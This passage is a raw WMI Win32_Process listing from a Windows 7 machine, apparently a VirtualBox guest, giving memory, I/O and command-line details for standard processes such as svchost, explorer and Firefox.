TerminationDate : ThreadCount : 48 UserModeTime : 108055376 VirtualSize : 164155392 WindowsVersion : 6.1.7600 WorkingSetSize : 21028864 WriteOperationCount : 7077 WriteTransferCount : 393943192 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 1401 VM : 164155392 WS : 21028864 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1108" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1108" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalService CreationClassName : Win32_Process CreationDate : 20170712122330.665299-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 1108 HandleCount : 498 InstallDate : KernelModeTime : 5708208 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 13888 OtherTransferCount : 523968 PageFaults : 7285 PageFileUsage : 6252 ParentProcessId : 488 PeakPageFileUsage : 6940 PeakVirtualSize : 64761856 PeakWorkingSetSize : 10784 Priority : 8 PrivatePageCount : 6402048 ProcessId : 1108 QuotaNonPagedPoolUsage : 19 QuotaPagedPoolUsage : 61 QuotaPeakNonPagedPoolUsage : 24 QuotaPeakPagedPoolUsage : 66 ReadOperationCount : 310 ReadTransferCount : 183135 SessionId : 0 Status : TerminationDate : ThreadCount : 21 UserModeTime : 4907056 VirtualSize : 55312384 WindowsVersion : 6.1.7600 WorkingSetSize : 9084928 WriteOperationCount : 42 WriteTransferCount : 2452 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 498 VM : 55312384 WS : 9084928 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1240" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1240" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k NetworkService CreationClassName : Win32_Process CreationDate : 20170712122330.991419-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 1240 HandleCount : 594 InstallDate : KernelModeTime : 6809792 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 53068 OtherTransferCount : 2086541 PageFaults : 9584 PageFileUsage : 11972 ParentProcessId : 488 PeakPageFileUsage : 12872 PeakVirtualSize : 84770816 PeakWorkingSetSize : 11320 Priority : 8 PrivatePageCount : 12259328 ProcessId : 1240 QuotaNonPagedPoolUsage : 20 QuotaPagedPoolUsage : 74 QuotaPeakNonPagedPoolUsage : 25 QuotaPeakPagedPoolUsage : 75 ReadOperationCount : 284 ReadTransferCount : 739919 SessionId : 0 Status : TerminationDate : ThreadCount : 24 UserModeTime : 2103024 VirtualSize : 79527936 WindowsVersion : 6.1.7600 WorkingSetSize : 10477568 WriteOperationCount : 541 WriteTransferCount : 1281099 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 594 VM : 79527936 WS : 10477568 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1332" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1332" Caption : spoolsv.exe CommandLine : C:\Windows\System32\spoolsv.exe CreationClassName : Win32_Process CreationDate : 20170712122331.205295-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : spoolsv.exe ExecutablePath : C:\Windows\System32\spoolsv.exe ExecutionState : Handle : 1332 HandleCount : 280 InstallDate : KernelModeTime : 400576 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : spoolsv.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 782 OtherTransferCount : 11299 PageFaults : 2916 PageFileUsage : 4324 ParentProcessId : 488 PeakPageFileUsage : 4564 PeakVirtualSize : 61775872 PeakWorkingSetSize : 8532 Priority : 8 PrivatePageCount : 4427776 ProcessId : 1332 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 56 QuotaPeakNonPagedPoolUsage : 10 QuotaPeakPagedPoolUsage : 56 ReadOperationCount : 4 ReadTransferCount : 1225 SessionId : 0 Status : TerminationDate : ThreadCount : 12 UserModeTime : 100144 VirtualSize : 60256256 WindowsVersion : 6.1.7600 WorkingSetSize : 5652480 WriteOperationCount : 2 WriteTransferCount : 232 PSComputerName : JOHN-PC ProcessName : spoolsv.exe Handles : 280 VM : 60256256 WS : 5652480 Path : C:\Windows\System32\spoolsv.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1368" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1368" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork CreationClassName : Win32_Process CreationDate : 20170712122331.351993-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 1368 HandleCount : 308 InstallDate : KernelModeTime : 3004320 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 69575 OtherTransferCount : 1630938 PageFaults : 19463 PageFileUsage : 8512 ParentProcessId : 488 PeakPageFileUsage : 28608 PeakVirtualSize : 65683456 PeakWorkingSetSize : 26852 Priority : 8 PrivatePageCount : 8716288 ProcessId : 1368 QuotaNonPagedPoolUsage : 25 QuotaPagedPoolUsage : 36 QuotaPeakNonPagedPoolUsage : 27 QuotaPeakPagedPoolUsage : 40 ReadOperationCount : 509 ReadTransferCount : 43006740 SessionId : 0 Status : TerminationDate : ThreadCount : 18 UserModeTime : 5307632 VirtualSize : 47792128 WindowsVersion : 6.1.7600 WorkingSetSize : 7675904 WriteOperationCount : 10 WriteTransferCount : 424892 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 308 VM : 47792128 WS : 7675904 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1504" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1504" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation CreationClassName : Win32_Process CreationDate : 20170712122331.467871-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 1504 HandleCount : 303 InstallDate : KernelModeTime : 2904176 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 55150 OtherTransferCount : 1627911 PageFaults : 5999 PageFileUsage : 4296 ParentProcessId : 488 PeakPageFileUsage : 4932 PeakVirtualSize : 70107136 PeakWorkingSetSize : 8540 Priority : 8 PrivatePageCount : 4399104 ProcessId : 1504 QuotaNonPagedPoolUsage : 15 QuotaPagedPoolUsage : 61 QuotaPeakNonPagedPoolUsage : 25 QuotaPeakPagedPoolUsage : 62 ReadOperationCount : 1 ReadTransferCount : 92 SessionId : 0 Status : TerminationDate : ThreadCount : 20 UserModeTime : 2303312 VirtualSize : 66961408 WindowsVersion : 6.1.7600 WorkingSetSize : 6828032 WriteOperationCount : 1 WriteTransferCount : 116 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 303 VM : 66961408 WS : 6828032 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1896" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1896" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712122332.174175-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 1896 HandleCount : 94 InstallDate : KernelModeTime : 701008 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 4399 OtherTransferCount : 97894 PageFaults : 1276 PageFileUsage : 1104 ParentProcessId : 488 PeakPageFileUsage : 1132 PeakVirtualSize : 26558464 PeakWorkingSetSize : 3892 Priority : 8 PrivatePageCount : 1130496 ProcessId : 1896 QuotaNonPagedPoolUsage : 7 QuotaPagedPoolUsage : 30 QuotaPeakNonPagedPoolUsage : 9 QuotaPeakPagedPoolUsage : 30 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 5 UserModeTime : 600864 VirtualSize : 26292224 WindowsVersion : 6.1.7600 WorkingSetSize : 3489792 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 94 VM : 26292224 WS : 3489792 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1668" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1668" Caption : svchost.exe CommandLine : C:\Windows\System32\svchost.exe -k secsvcs CreationClassName : Win32_Process CreationDate : 20170712122344.727197-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\System32\svchost.exe ExecutionState : Handle : 1668 HandleCount : 359 InstallDate : KernelModeTime : 14621024 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 12927 OtherTransferCount : 444738 PageFaults : 166121 PageFileUsage : 145148 ParentProcessId : 488 PeakPageFileUsage : 245408 PeakVirtualSize : 317341696 PeakWorkingSetSize : 243872 Priority : 8 PrivatePageCount : 148631552 ProcessId : 1668 QuotaNonPagedPoolUsage : 36 QuotaPagedPoolUsage : 64 QuotaPeakNonPagedPoolUsage : 41 QuotaPeakPagedPoolUsage : 75 ReadOperationCount : 917 ReadTransferCount : 46138771 SessionId : 0 Status : TerminationDate : ThreadCount : 13 UserModeTime : 47968976 VirtualSize : 219480064 WindowsVersion : 6.1.7600 WorkingSetSize : 8355840 WriteOperationCount : 214 WriteTransferCount : 6614 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 359 VM : 219480064 WS : 8355840 Path : C:\Windows\System32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1192" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1192" Caption : SearchIndexer.exe CommandLine : C:\Windows\system32\SearchIndexer.exe /Embedding CreationClassName : Win32_Process CreationDate : 20170712122548.509448-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : SearchIndexer.exe ExecutablePath : C:\Windows\system32\SearchIndexer.exe ExecutionState : Handle : 1192 HandleCount : 667 InstallDate : KernelModeTime : 4606624 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : SearchIndexer.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 52920 OtherTransferCount : 4811782 PageFaults : 9205 PageFileUsage : 15412 ParentProcessId : 488 PeakPageFileUsage : 16316 PeakVirtualSize : 113541120 PeakWorkingSetSize : 12264 Priority : 8 PrivatePageCount : 15781888 ProcessId : 1192 QuotaNonPagedPoolUsage : 17 QuotaPagedPoolUsage : 71 QuotaPeakNonPagedPoolUsage : 22 QuotaPeakPagedPoolUsage : 96 ReadOperationCount : 609 ReadTransferCount : 6666438 SessionId : 0 Status : TerminationDate : ThreadCount : 11 UserModeTime : 7310512 VirtualSize : 87171072 WindowsVersion : 6.1.7600 WorkingSetSize : 7647232 WriteOperationCount : 210 WriteTransferCount : 962228 PSComputerName : JOHN-PC ProcessName : SearchIndexer.exe Handles : 667 VM : 87171072 WS : 7647232 Path : C:\Windows\system32\SearchIndexer.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1264" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1264" Caption : dwm.exe CommandLine : "C:\Windows\system32\Dwm.exe" CreationClassName : Win32_Process CreationDate : 20170712123339.426000-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : dwm.exe ExecutablePath : C:\Windows\system32\Dwm.exe ExecutionState : Handle : 1264 HandleCount : 66 InstallDate : KernelModeTime : 0 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dwm.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 226 OtherTransferCount : 786 PageFaults : 993 PageFileUsage : 872 ParentProcessId : 900 PeakPageFileUsage : 1036 PeakVirtualSize : 42967040 PeakWorkingSetSize : 3464 Priority : 8 PrivatePageCount : 892928 ProcessId : 1264 QuotaNonPagedPoolUsage : 4 QuotaPagedPoolUsage : 40 QuotaPeakNonPagedPoolUsage : 4 QuotaPeakPagedPoolUsage : 44 ReadOperationCount : 1 ReadTransferCount : 15398 SessionId : 1 Status : TerminationDate : ThreadCount : 3 UserModeTime : 200288 VirtualSize : 40202240 WindowsVersion : 6.1.7600 WorkingSetSize : 3006464 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : dwm.exe Handles : 66 VM : 40202240 WS : 3006464 Path : C:\Windows\system32\Dwm.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="980" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="980" Caption : explorer.exe CommandLine : C:\Windows\Explorer.EXE CreationClassName : Win32_Process CreationDate : 20170712123339.446028-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : explorer.exe ExecutablePath : C:\Windows\Explorer.EXE ExecutionState : Handle : 980 HandleCount : 671 InstallDate : KernelModeTime : 9513680 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : explorer.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 10039 OtherTransferCount : 899546 PageFaults : 16650 PageFileUsage : 17808 ParentProcessId : 144 PeakPageFileUsage : 18464 PeakVirtualSize : 197206016 PeakWorkingSetSize : 27632 Priority : 8 PrivatePageCount : 18235392 ProcessId : 980 QuotaNonPagedPoolUsage : 22 QuotaPagedPoolUsage : 189 QuotaPeakNonPagedPoolUsage : 27 QuotaPeakPagedPoolUsage : 195 ReadOperationCount : 880 ReadTransferCount : 2500972 SessionId : 1 Status : TerminationDate : ThreadCount : 20 UserModeTime : 4306192 VirtualSize : 195244032 WindowsVersion : 6.1.7600 WorkingSetSize : 27623424 WriteOperationCount : 7 WriteTransferCount : 1622 PSComputerName : JOHN-PC ProcessName : explorer.exe Handles : 671 VM : 195244032 WS : 27623424 Path : C:\Windows\Explorer.EXE __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1344" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1344" Caption : taskhost.exe CommandLine : "taskhost.exe" CreationClassName : Win32_Process CreationDate : 20170712123339.466057-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : taskhost.exe ExecutablePath : C:\Windows\system32\taskhost.exe ExecutionState : Handle : 1344 HandleCount : 141 InstallDate : KernelModeTime : 200288 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : taskhost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 297 OtherTransferCount : 692 PageFaults : 1863 PageFileUsage : 2024 ParentProcessId : 488 PeakPageFileUsage : 2120 PeakVirtualSize : 44015616 PeakWorkingSetSize : 4780 Priority : 8 PrivatePageCount : 2072576 ProcessId : 1344 QuotaNonPagedPoolUsage : 9 QuotaPagedPoolUsage : 45 QuotaPeakNonPagedPoolUsage : 9 QuotaPeakPagedPoolUsage : 46 ReadOperationCount : 3 ReadTransferCount : 62250 SessionId : 1 Status : TerminationDate : ThreadCount : 8 UserModeTime : 200288 VirtualSize : 41598976 WindowsVersion : 6.1.7600 WorkingSetSize : 4276224 WriteOperationCount : 2 WriteTransferCount : 142 PSComputerName : JOHN-PC ProcessName : taskhost.exe Handles : 141 VM : 41598976 WS : 4276224 Path : C:\Windows\system32\taskhost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2056" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="2056" Caption : VBoxTray.exe CommandLine : "C:\Windows\System32\VBoxTray.exe" CreationClassName : Win32_Process CreationDate : 20170712123340.046892-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : VBoxTray.exe ExecutablePath : C:\Windows\System32\VBoxTray.exe ExecutionState : Handle : 2056 HandleCount : 136 InstallDate : KernelModeTime : 1502160 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : VBoxTray.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 52845 OtherTransferCount : 349038 PageFaults : 13153 PageFileUsage : 1244 ParentProcessId : 980 PeakPageFileUsage : 1280 PeakVirtualSize : 65552384 PeakWorkingSetSize : 4516 Priority : 8 PrivatePageCount : 1273856 ProcessId : 2056 QuotaNonPagedPoolUsage : 6 QuotaPagedPoolUsage : 53 QuotaPeakNonPagedPoolUsage : 6 QuotaPeakPagedPoolUsage : 54 ReadOperationCount : 8095 ReadTransferCount : 81006 SessionId : 1 Status : TerminationDate : ThreadCount : 11 UserModeTime : 300432 VirtualSize : 61358080 WindowsVersion : 6.1.7600 WorkingSetSize : 3899392 WriteOperationCount : 4047 WriteTransferCount : 16188 PSComputerName : JOHN-PC ProcessName : VBoxTray.exe Handles : 136 VM : 61358080 WS : 3899392 Path : C:\Windows\System32\VBoxTray.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2244" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="2244" Caption : firefox.exe CommandLine : "C:\Program Files\Mozilla Firefox\firefox.exe" CreationClassName : Win32_Process CreationDate : 20170712123342.971132-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : firefox.exe ExecutablePath : C:\Program Files\Mozilla Firefox\firefox.exe ExecutionState : Handle : 2244 HandleCount : 622 InstallDate : KernelModeTime : 103649040 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : firefox.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 67866 OtherTransferCount : 1039678 PageFaults : 381767 PageFileUsage : 122084 ParentProcessId : 980 PeakPageFileUsage : 148096 PeakVirtualSize : 604745728 PeakWorkingSetSize : 155248 Priority : 8 PrivatePageCount : 125014016 ProcessId : 2244 QuotaNonPagedPoolUsage : 28 QuotaPagedPoolUsage : 200 QuotaPeakNonPagedPoolUsage : 158 QuotaPeakPagedPoolUsage : 203 ReadOperationCount : 7689 ReadTransferCount : 411068937 SessionId : 1 Status : TerminationDate : ThreadCount : 45 UserModeTime : 438530576 VirtualSize : 579633152 WindowsVersion : 6.1.7600 WorkingSetSize : 135786496 WriteOperationCount : 941843 WriteTransferCount : 176029996 PSComputerName : JOHN-PC ProcessName : firefox.exe Handles : 622 VM : 579633152 WS : 135786496 Path : C:\Program Files\Mozilla Firefox\firefox.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2480" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="2480" Caption : firefox.exe CommandLine : "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.0.548555581\175440830" -childID 1 -isForBrowser -intPrefs 5:50|6:-1|28:1000|33:20|34:10|43:128|44 :10000|48:0|50:400|51:1|52:0|53:0|58:0|59:120|60:120|133:2|134:1|147:5000|157:0|159:0|170:10000|182:-1|187:128|188:10000|189:0|195:24|196:32768|198:0|199:0|207:5|211:1048576 |212:100|213:5000|215:600|217:1|226:1|231:0|241:60000| -boolPrefs 1:0|2:0|4:0|26:1|27:1|30:0|35:1|36:0|37:0|38:0|39:1|40:0|41:1|42:1|45:0|46:0|47:0|49:0|54:1|55:1|56:0|57:1| 61:1|62:1|63:0|64:1|65:1|66:0|67:1|70:0|71:0|74:1|75:1|79:1|80:1|81:0|82:0|84:0|85:0|86:1|87:0|90:0|91:1|92:1|93:1|94:1|95:1|96:0|97:0|98:1|99:0|100:0|101:0|102:1|103:1|104: 0|105:1|106:1|107:0|108:0|109:1|110:1|111:1|112:0|113:1|114:1|115:1|116:1|117:1|118:1|119:1|120:1|122:0|123:0|124:0|125:1|126:0|127:1|131:1|132:1|135:1|136:0|141:0|146:0|149 :1|152:1|154:1|158:0|161:1|164:1|165:1|171:0|172:0|173:1|175:0|181:0|183:1|184:0|185:0|186:0|193:0|194:0|197:1|200:0|202:0|204:1|205:0|210:0|214:1|219:0|220:0|221:0|222:1|22 4:1|225:1|228:0|233:0|234:0|235:1|236:1|237:0|238:1|239:1|240:0|242:0|243:0|245:0|253:1|254:1|255:0|256:0|257:0| -stringPrefs "3:7;release|174:3;1.0|191:332; ¼½¾!???:?????%? ??????? ???????-’·?????????‹›?/???????????????/:?????????????????? ???????????????????./???????|192:8;moderate|227:38;{1a7261b9-5e44-4ce3-bde9-ad3e4a859d9a}|" -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" 2244 "\\.\pipe\gecko-crash-server-pipe.2244" tab CreationClassName : Win32_Process CreationDate : 20170712123344.804771-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : firefox.exe ExecutablePath : C:\Program Files\Mozilla Firefox\firefox.exe ExecutionState : Handle : 2480 HandleCount : 291 InstallDate : KernelModeTime : 10214688 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : firefox.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 2838 OtherTransferCount : 21324 PageFaults : 26002 PageFileUsage : 30428 ParentProcessId : 2244 PeakPageFileUsage : 36828 PeakVirtualSize : 374845440 PeakWorkingSetSize : 61540 Priority : 8 PrivatePageCount : 31158272 ProcessId : 2480 QuotaNonPagedPoolUsage : 16 QuotaPagedPoolUsage : 152 QuotaPeakNonPagedPoolUsage : 21 QuotaPeakPagedPoolUsage : 159 ReadOperationCount : 6709 ReadTransferCount : 59186239 SessionId : 1 Status : TerminationDate : ThreadCount : 20 UserModeTime : 7110224 VirtualSize : 361779200 WindowsVersion : 6.1.7600 WorkingSetSize : 42983424 WriteOperationCount : 4326 WriteTransferCount : 576704 PSComputerName : JOHN-PC ProcessName : firefox.exe Handles : 291 VM : 361779200 WS : 42983424 Path : C:\Program Files\Mozilla Firefox\firefox.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2844" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="2844" Caption : wmpnetwk.exe CommandLine : "C:\Program Files\Windows Media Player\wmpnetwk.exe" CreationClassName : Win32_Process CreationDate : 20170712123348.174625-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : wmpnetwk.exe ExecutablePath : C:\Program Files\Windows Media Player\wmpnetwk.exe ExecutionState : Handle : 2844 HandleCount : 220 InstallDate : KernelModeTime : 901296 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : wmpnetwk.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3426 OtherTransferCount : 106030 PageFaults : 13164 PageFileUsage : 3292 ParentProcessId : 488 PeakPageFileUsage : 3732 PeakVirtualSize : 84627456 PeakWorkingSetSize : 8672 Priority : 8 PrivatePageCount : 3371008 ProcessId : 2844 QuotaNonPagedPoolUsage : 8 QuotaPagedPoolUsage : 81 QuotaPeakNonPagedPoolUsage : 9 QuotaPeakPagedPoolUsage : 86 ReadOperationCount : 710 ReadTransferCount : 147842 SessionId : 0 Status : TerminationDate : ThreadCount : 9 UserModeTime : 2002880 VirtualSize : 78745600 WindowsVersion : 6.1.7600 WorkingSetSize : 3600384 WriteOperationCount : 8 WriteTransferCount : 544 PSComputerName : JOHN-PC ProcessName : wmpnetwk.exe Handles : 220 VM : 78745600 WS : 3600384 Path : C:\Program Files\Windows Media Player\wmpnetwk.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3024" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3024" Caption : svchost.exe CommandLine : C:\Windows\System32\svchost.exe -k LocalServicePeerNet 